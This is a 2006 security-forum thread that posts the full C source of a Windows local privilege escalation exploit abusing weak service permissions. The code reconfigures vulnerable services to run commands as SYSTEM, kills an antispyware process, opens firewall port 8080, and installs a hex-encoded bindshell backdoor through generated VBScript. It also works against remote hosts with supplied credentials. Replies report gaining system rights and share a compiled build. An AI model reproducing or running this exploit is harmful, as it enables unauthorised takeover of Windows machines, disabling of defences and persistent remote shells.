Government Security
Network Security Resources

Jump to content

Photo

Ms Windows Services Acls Local Privilege Escalation Exploit (update)

- - - - - cache backdoor
  • Please log in to reply
9 replies to this topic

#1 blackP0ster

blackP0ster

    Specialist

  • Members
  • 129 posts

Posted 12 February 2006 - 02:02 PM

/*
* Privilege Scalation for Windows Networks using weak Service restrictions v2.0
* (c) 2006 Andres Tarasco Acuña ( atarasco _at_ gmail.com )
* Date: February 6, 2006 - http://www.haxorcitos.com
* http://microsoft.com/technet/security/advisory/914457.mspx
*
* ---------------------------------------
* LIST OF WELL KNOWN VULNERABLE SERVICES
* ---------------------------------------
*
* * Windows XP with sp2
* - As Power User:
* service: DcomLaunch ( SYSTEM )
* Service: UpnpHost ( Local Service )
* Service: SSDPSRV (Local Service)
* Service: WMI (SYSTEM) <- sometimes as user also..
* - As User:
* Service: UpnpHost ( Local Service )
* Service: SSDPSRV (Local Service)
* - As Network Config Operators:
* service: DcomLaunch ( SYSTEM )
* Service: UpnpHost ( Local Service )
* Service: SSDPSRV (Local Service)
* Service: DHCP ( SYSTEM )
* Service: NetBT (SYSTEM - .sys driver)
* Service DnsCache (SYSTEM)
*
* * Windows 2000
* - As Power user
* service: WMI (SYSTEM)
*
* * Third Part software (local & remote code execution)
* Service: [Pml Driver HPZ12] (HP Software - C:\WINNT\system32\spool\DRIVERS\W32X86\3\HPZipm12.exe)
* -Granted Full Control to Everyone Group.
*
* Service: [Autodesk Licensing Service] (Autocad - C:\program files\Common files\Autodesk Shared\Service\AdskScSrv.exe)
* -Maybe related to: http://www.securityfocus.com/bid/16472
* -Autodesk Multiple Products Remote Unauthorized Access Vulnerability
*
*
* IMPORTANT!! You should execute this tool without Admin privileges on the target system
* srvcheck.exe -? for information about usage.
*
* NOTE: This code compiles under Borland C++ Builder
*
*/
#include
#include

//Functions
void doFormatMessage( unsigned int dwLastErr );
void usage(void);
DWORD StartModifiedService(SC_HANDLE SCM, char *srv, BOOL dbg);
void ListVulnerableService(char *host);
char *GetOwner(char *servicio);


//Remove previously created files
char init[]="cmd.exe /c rd /Q /S \\HXR";
char antispyware[]="taskkill.exe /IM gcasDtServ.exe";
char firewall[]="cmd.exe /c netsh firewall add portopening TCP 8080 SrvCheck ENABLE ALL";


char EncodedBackdoor[]=
"cmd.exe /c md \\HXR && " //Final Bindshell-code is an 804 bytes binary
//Encoded with Tarako Exe2vbs (http://www.haxorcitos.com)
"echo f= \"4D5A000001z3z04z5z01z9z40z35z50z3z665AB44CCD21z10z504500004C0
1030048585221z8zE0000F010B010600A8z3zBCz7zC0010000C00100006802z4z400004z
3z04z3z04z7z04z7z2403000028\">\\HXR\\a.vbs && "
"echo f=f ^& \"02z6z02z5z10000010z4z10000010z6z10z11z880200003Cz83z68020
00020z27z2E576F70z4zA6z3zC0010000A8z3zC001z14z200000602E615434z4zB6z3z68
020000B8z3z6802z14z400000402E54\">>\\HXR\\a.vbs && "
"echo f=f ^& \"524Bz4z04z3z2003000004z3z2003z14z400000C0558BEC81ECF40100
00538D850CFEFFFF56506801010000FF157402400033F65656566A066A016A02FF157002
40008BD88D45F06A10505366C745F002\">>\\HXR\\a.vbs && "
"echo f=f ^& \"0066C745F21F908975F4FF15780240006A0153FF157C0240008D45F05
65053FF15800240008945EC8945E88945E48D459C508D45AC505656566A0156566820034
00056C745AC44z3z668975DCC745D801\">>\\HXR\\a.vbs && "
"echo f=f ^& \"0100008975B88975B48975E0FF15680240005E5BC9C210z3zFE02z6zE
402000073000080020000800D00008001000080z4zCC02z10zF202000070020000C402z1
0z100300006802z22zFE02z6zE40200\">>\\HXR\\a.vbs && "
"echo f=f ^& \"0073000080020000800D00008001000080z4z3D00575341536F636B65
744100005753325F33322E646C6C0000440043726561746550726F636573734100004B45
524E454C33322E646C6Cz4z636D6400\">>\\HXR\\a.vbs && "
"echo i=1 : t = \"\" : While i^<=len(f) : If mid(f,i,1) = \"z\" then>>\\
HXR\\a.vbs && "
"echo a=i+1 : k = 0 : while mid(f,a,1)^<^>\"z\" : k = k*10 + mid(f,a,1) :
a = a+1 : WEnd : i = a+1 : for a=1 to k : t = t + \"00\" : Next>>\\HXR\\
a.vbs && "
"echo ElseIf mid(f,i,1) ^<^> \"z\" then : t = t ^& mid(f,i,2) : i = i+2 >>
\\HXR\\a.vbs && "
"echo end if : WEnd : Set o = CreateObject(\"Scripting.FileSystemObject\")
>>\\HXR\\a.vbs && "
"echo Set n = o.CreateTextFile(\"\\HXR\\a.exe\", ForWriting) : i = 1 : whi
le i ^< len(t)>>\\HXR\\a.vbs && "
"echo f = Int(\"&H\" ^& Mid(t, i, 2)) : n.Write(Chr(f)) : i = i+2 : WEnd :
n.Close>>\\HXR\\a.vbs && "
"echo Set s=CreateObject(\"WScript.Shell\") : s.run(\"\\HXR\\a.exe\")>>\\
HXR\\a.vbs &&"
"\\HXR\\a.vbs /B";

BYTE LIST=0,HELP=0,BACKDOOR=1, STOP=0;
char RemoteHost[256];
char permission[256];

/******************************************************************************/
int main(int argc, char* argv[]) {

SC_HANDLE SCM,Svc;
DWORD ret,len;
char CurrentUserName[256];
char *newPath=NULL;
char *host=NULL;
char *user=NULL;
char *pass=NULL;
char *srv=NULL;
int i;
NETRESOURCE NET;
SERVICE_STATUS_PROCESS StopStatus;

printf(" Services Permissions checker v2.0\n");
printf(" (c) 2006 Andres Tarasco - atarasco%cgmail.com\n\n",'@');

if (argc==1) usage();
for (i=1;i
if ( (strlen(argv)==2) && (argv[0]=='-') ) {
switch (argv[1]) {
case 'l': LIST=1; break;
case 'm': srv=argv[i+1]; i=i+1;break;
case 'u': if (!host) usage(); user=argv[i+1]; i=i++; break;
case 'p': if (!host) usage(); pass=argv[i+1]; i=i++; break;
case 'H': host=argv[i+1]; i=i++; break;
case 'c': newPath=argv[i+1]; i=i+1; BACKDOOR=0; break;
case 's': STOP=1; break;
case '?': HELP=1; usage(); break;
default: printf("Unknown Parameter: %s\n",argv);usage(); break;
}
}
}

if ((!LIST) && (!srv) )usage();

if (host) { //Inicialización.. Conexión al sistema remoto..
printf("[+] Trying to connect to remote SCM\n");
sprintf(RemoteHost,"\\\\%s\\IPC$",host);
printf("[+] Host: %s\n",RemoteHost);
printf("[+] Username: %s\n",user);
printf("[+] Password: %s\n",pass);

NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL;
NET.lpLocalName=NULL;
NET.lpRemoteName = (char *)RemoteHost;
ret=WNetAddConnection2(&NET,pass,user,CONNECT_COMMANDLINE);//CONNECT_PROMPT);//CONNECT_UPDATE_PROFILE);

//verificación de errores de conexión...
if ( (ret!=NO_ERROR) && (user !=NULL) ) {
if (ret==1219) { //connection already created. Disconnecting..
printf("[-] Credentials mismatch. Removing old connection\n");
WNetCancelConnection2(RemoteHost,NULL,TRUE);
ret=WNetAddConnection2(&NET,pass,user,CONNECT_UPDATE_PROFILE);
} else {
if (ret==1326) { //usuario o contraseña incorrecta
if (strchr(user,'\\')==NULL) {
sprintf(CurrentUserName,"localhost\\%s",user);
printf("[-] Unknown Username or password\n");
printf("[+] Trying \"%s\" as new username\n",CurrentUserName);
ret=WNetAddConnection2(&NET,pass,CurrentUserName,CONNECT_UPDATE_PROFILE);
}
}
}
if (ret!=NO_ERROR) {
printf("WNetAddConnection Failed to %s (%s/ %s)\n",RemoteHost,user,pass);
doFormatMessage(GetLastError());
exit(-1);
}
}
printf("[+] Network Connection OK\n");

} else {
printf("[+] Trying to enumerate local resources\n");
len=sizeof(CurrentUserName)-1;
GetUserName( CurrentUserName,&len);
printf("[+] Username: %s\n",CurrentUserName);
}


if (LIST) {
ListVulnerableService(host);
exit(1);
}

//SERVICE HACKS HERE!!


SCM = OpenSCManager(host,NULL,STANDARD_RIGHTS_WRITE | SERVICE_START );
if (!SCM){
printf("[-] OpenScManager() FAILED\n");
doFormatMessage(GetLastError());
exit(-1);
}
if (STOP) {
Svc = OpenService(SCM,srv,SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE | SERVICE_STOP);
} else {
Svc = OpenService(SCM,srv,SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE);
}

if (Svc==NULL) {
printf("[-] Unable to open Service %s\n",srv);
exit(-1);
}

// printf("[+] Using leetz skillz to execute backdoor =)\n");

//Delete previous installed

if (STOP) {
printf("[+] Stopping previously running instances...\n");
if (ControlService(Svc,SERVICE_CONTROL_STOP,&StopStatus)!=0) {
doFormatMessage(GetLastError());

}
exit(-1);
}


if (BACKDOOR) {
printf("[+] Uninstalling previous backdoors\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,init,NULL,NULL,"",
NULL,NULL,NULL);

if (ret!=0) StartModifiedService(SCM,srv,0);

printf("[+] Granting Remote bindshell Execution..\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,firewall,NULL,NULL,"",
NULL,NULL,NULL);
if (ret!=0) StartModifiedService(SCM,srv,0);
printf("[+] Shutting down remote antispyware Service =)\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,antispyware,NULL,NULL,"",
NULL,NULL,NULL);
if (ret!=0) StartModifiedService(SCM,srv,0);
printf("[+] Installing Backdoor Code...\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,EncodedBackdoor,NULL,NULL,"",
NULL,NULL,NULL);
} else { //Ejecutando parametros especificados con -c
printf("[+] Sending custom commands to the service\n");
ret=ChangeServiceConfig(
Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,newPath,NULL,NULL,"",
NULL,NULL,NULL);
}

if (ret!=0) {
printf("[+] The service have been succesfully modified =)\n");
CloseServiceHandle(Svc);
StartModifiedService(SCM,srv,1);
} else {
printf("[-] Service modification Failed\n");
doFormatMessage(ret);
}
CloseServiceHandle(SCM);
if (host) WNetCancelConnection2(RemoteHost,NULL,TRUE);
return(1);
}

/******************************************************************************/
void doFormatMessage( unsigned int dwLastErr ) {
LPVOID lpMsgBuf;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_IGNORE_INSERTS |
FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
dwLastErr,
MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),
(LPTSTR) &lpMsgBuf,
0,
NULL );
printf("ErrorCode %i: %s\n", dwLastErr, lpMsgBuf);
LocalFree( lpMsgBuf );
}

/******************************************************************************/

DWORD StartModifiedService(SC_HANDLE SCM, char *srv, BOOL dbg) {

SC_HANDLE Svc;
DWORD Error;
SERVICE_STATUS_PROCESS StartStatus;
DWORD dwByteNeeded;

DWORD dwOldCheckPoint;
DWORD dwStartTickCount;
DWORD dwWaitTime;

Svc= OpenService( SCM, srv, SERVICE_ALL_ACCESS);

if (Svc==NULL) {
if (dbg) printf("[-] Unable to reopen service for starting..\n");
return(-1);
} else {
if (dbg) printf("[+] Service Opened. Trying to Start... (wait a few seconds)\n");
}

if (!StartService(Svc,0,NULL)) {
Error=GetLastError();
if (Error==1053) {
if (dbg) {
printf("[+] StarteService() Error due to a non service application execution\n");
printf("[+] Ignore it. Your application should be executed =)\n");
if (BACKDOOR) {
printf("[+] Now connect to port 8080 and enjoy your new privileges\n");
}
}
} else {
if (dbg) {
printf("[-] Unable to start Service :/\n");
doFormatMessage(Error);
}
return(Error);
}

} else {
if (dbg) printf("[+] Starting Service....\n");
if (!QueryServiceStatusEx(
Svc, // handle to service
SC_STATUS_PROCESS_INFO, // info level
&StartStatus, // address of structure
sizeof(SERVICE_STATUS_PROCESS), // size of structure
&dwByteNeeded) ) // if buffer too small
{
if (dbg) printf("[-] Unable to QueryServiceStatusEx() \n");
return(-2);
} else {

//Revisión de si arranca el servicio..
// Save the tick count and initial checkpoint.
dwStartTickCount = GetTickCount();
dwOldCheckPoint = StartStatus.dwCheckPoint;
while (StartStatus.dwCurrentState == SERVICE_START_PENDING)
{
if (dbg) printf("Wait Time: %i\n",StartStatus.dwWaitHint);
dwWaitTime = StartStatus.dwWaitHint / 10;
if( dwWaitTime < 1000 )
dwWaitTime = 1000;
else if ( dwWaitTime > 10000 )
dwWaitTime = 10000;
Sleep( dwWaitTime );
// Check the status again.

if (!QueryServiceStatusEx(
Svc, // handle to service
SC_STATUS_PROCESS_INFO, // info level
&StartStatus, // address of structure
sizeof(SERVICE_STATUS_PROCESS), // size of structure
&dwByteNeeded ) ) // if buffer too small
{
if (dbg) printf("[-] Unable to QueryServiceStatusEx() \n");
return(-2);
}
if ( StartStatus.dwCheckPoint > dwOldCheckPoint )
{
// The service is making progress.
dwStartTickCount = GetTickCount();
dwOldCheckPoint = StartStatus.dwCheckPoint;
} else {
if(GetTickCount()-dwStartTickCount > StartStatus.dwWaitHint)
{
// No progress made within the wait hint
if (dbg) printf("el servicio no se ha arrancado...\n");
break;
}
}
}
}
CloseServiceHandle(Svc);
if (StartStatus.dwCurrentState == SERVICE_RUNNING)
{
if (dbg) printf("[+] StartService SUCCESS.\n");
return 1;
}
else
{
if (dbg) printf("\n[-] Service not started. \n");
}
}
return(0);
}


/******************************************************************************/
/******************************************************************************/
void usage(void) {
printf(" Usage:\n\t-l\t\t list vulnerable services\n");
printf("\t-m \t modify the configuration for that service\n");
printf("\t-c \t Command to execute throw remote service\n");
printf("\t\t\t by default. bindshell application will be used\n");
printf("\t-H \t specify a remote host to connect ip/netbiosname)\n");
printf("\t-u \t if not seletected Default logon credentials used)\n");
printf("\t-p \t if not used Default logon credentials used)\n");
printf("\t-?\t\t Extended information with samples\n");

if (HELP) {
printf(" examples:\n");
printf("\tsrvcheck.exe -l (list local vulnerabilities)\n");
printf("\tsrvcheck.exe -m service (spawn a shell at port 8080)\n");
printf("\tsrvcheck.exe -m service -c \"cmd.exe /c md c:\\PWNED\"\n"),
printf("\tsrvcheck -l -H host (list remote vulnerabilities)\n");
}
exit(-1);
}


/******************************************************************************/
void ListVulnerableService(char *host) {
SC_HANDLE SCM;
SC_HANDLE Svc;
DWORD nResumeHandle;
DWORD dwServiceType;
LPENUM_SERVICE_STATUS_PROCESS lpServices;
DWORD nSize = 0;
DWORD nServicesReturned;
unsigned int n;
unsigned int l=0;
DWORD dwByteNeeded;
LPQUERY_SERVICE_CONFIG lpConfig;
char *p;

SCM = OpenSCManager(host,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if (!SCM){
printf("[-] OpenScManager() FAILED\n");
doFormatMessage(GetLastError());
exit(-1);
}
nResumeHandle = 0;
dwServiceType = SERVICE_WIN32 | SERVICE_DRIVER;
lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, 65535);
if (!lpServices) {
printf("[-] CRITICAL ERROR: LocalAlloc() Failed\n");
exit(-1);
}
memset(lpServices,'\0',sizeof(lpServices));
if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO,
dwServiceType, SERVICE_STATE_ALL,
(LPBYTE)lpServices, 65535,
&nSize, &nServicesReturned,
&nResumeHandle, NULL) == 0)
{
printf("EnumServicesStatusEx FAILED\n");
exit(-1);
}

printf("[+] Listing Vulnerable Services...\n");
for (n = 0; n < nServicesReturned; n++) {
Svc = OpenService(SCM,lpServices[n].lpServiceName, SERVICE_CHANGE_CONFIG | SC_MANAGER_ENUMERATE_SERVICE |GENERIC_READ);
if (Svc!=NULL) {
l++;
printf("\n [%s]\t\t%s\n",lpServices[n].lpServiceName, lpServices[n].lpDisplayName);
printf(" Status: 0x%x\n",lpServices[n].ServiceStatusProcess.dwCurrentState);
if (!host) {
p=GetOwner(lpServices[n].lpServiceName);
if (p) {
printf(" Context:\t\t%s\n",p);
}
}
dwByteNeeded = 0;
lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024*8);
if (QueryServiceConfig(Svc, lpConfig, 1024*8, &dwByteNeeded)!=0) {
printf(" Parameter:\t\t%s\n",lpConfig->lpBinaryPathName);
}else {
doFormatMessage(GetLastError());
}
}
}
printf("\n[+] Analyzed %i Services in your system\n",nServicesReturned);
if (l>0) {
printf("[+] You were Lucky. %i vulnerable services found\n",l);
} else {
printf("[+] Your system is secure! Great! :/\n");
}
if (host) WNetCancelConnection2(RemoteHost,NULL,TRUE);
CloseServiceHandle(SCM);
LocalFree(lpServices);
exit(1);
}

/*****************************************************************************/

char *GetOwner(char *servicio) {

char path[256];
HKEY hReg;
DWORD len=sizeof(permission);

sprintf(path,"SYSTEM\\CurrentControlSet\\Services\\%s",servicio);
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,path,0,KEY_QUERY_VALUE,&hReg)== ERROR_SUCCESS ) {
if (RegQueryValueEx(hReg,"ObjectName",NULL,NULL,permission,&len)==ERROR_SUCCESS) {
RegCloseKey(hReg);
return(permission);
}
RegCloseKey(hReg);
}
return(NULL);
}

http://www.bb-pcsecu...cherheit_55.htm

compiled with borland c++.works gr8 :)

greets bb

#2 Guest_g0ril_*

Guest_g0ril_*
  • Guests

Posted 13 February 2006 - 02:13 AM

work under Windows 2000

that s nice to get systeme admin :D

thanks mate
Great

[+] Analyzed 260 Services in your system

[+] You were Lucky. 260 vulnerable services found

#3 Predjuh

Predjuh

    Private First Class

  • Members
  • 69 posts

Posted 13 February 2006 - 06:42 AM

I downloaded the Borland Compiler from the websites of borland.
I extract it to C:\Borland\BCC55

I gave this command:
C:\Borland\BCC55\Bin>bcc32.exe -exxx test.c -nxxx test.exe

what do I wrong ?

btw I'm using version:
Borland C++ 5.5.1 for Win32 Copyright © 1993, 2000 Borland

#4 assom

assom

    Private

  • Members
  • 16 posts

Posted 13 February 2006 - 10:51 AM

work under Windows 2000

that s nice to get systeme admin :D

thanks mate
Great

[+] Analyzed 260 Services in your system

[+] You were Lucky. 260 vulnerable services found


I think if you run it with an administrator account you will get all services are vulnerable.

The idea is to run it with a User or Power User.

#5 Guest_g0ril_*

Guest_g0ril_*
  • Guests

Posted 13 February 2006 - 11:46 AM

i test it in iusr and gave me system autority 2 bug found :D bindy to 8080 admin
i hope microsoft can patch all that bug u wull find 2 or 3 bugs

#6 Predjuh

Predjuh

    Private First Class

  • Members
  • 69 posts

Posted 13 February 2006 - 01:46 PM

i test it in iusr and gave me system autority 2 bug found :D bindy to 8080 admin
i hope microsoft can patch all that bug u wull find 2 or 3 bugs



yep it works for me now, could be handy ;)

#7 boshcash

boshcash

    Staff Sergeant

  • Sergeant Major
  • 461 posts

Posted 13 February 2006 - 02:05 PM

i hope it really works forever :)

i always had problems getting privledge escalation bugs for windows and didnt work fine , i used to get root exploits for linux easier one day :P

but this doesnt prove it , microsoft comes again to make sure its the weakest , and the windows os comes back as a hacker-friendly os ..

i was able to find 1 vuln service through a limited normal user on my pc winxp sp2 ..

#8 rafaboss

rafaboss

    Private First Class

  • Members
  • 34 posts

Posted 13 February 2006 - 03:29 PM

Hi,
This exploit compiled for all

Exploit

Files:
cc3260mt.dll
srvcheck_update.c
srvcheck_update.exe
srvcheck_update.txt

#9 Predjuh

Predjuh

    Private First Class

  • Members
  • 69 posts

Posted 15 February 2006 - 04:20 AM

Hi,
This exploit compiled for all

Exploit

Files:
cc3260mt.dll
srvcheck_update.c
srvcheck_update.exe
srvcheck_update.txt



thx m8, but what did I wrong? I can't compile it with borland .... maybe I need another commandline !

#10 Guest_Paul_*

Guest_Paul_*
  • Guests

Posted 20 February 2006 - 11:39 AM

No header files are included, thats why it wont compile. Include them yourself manually (try windows.h and stdio.h)





Also tagged with one or more of these keywords: cache, backdoor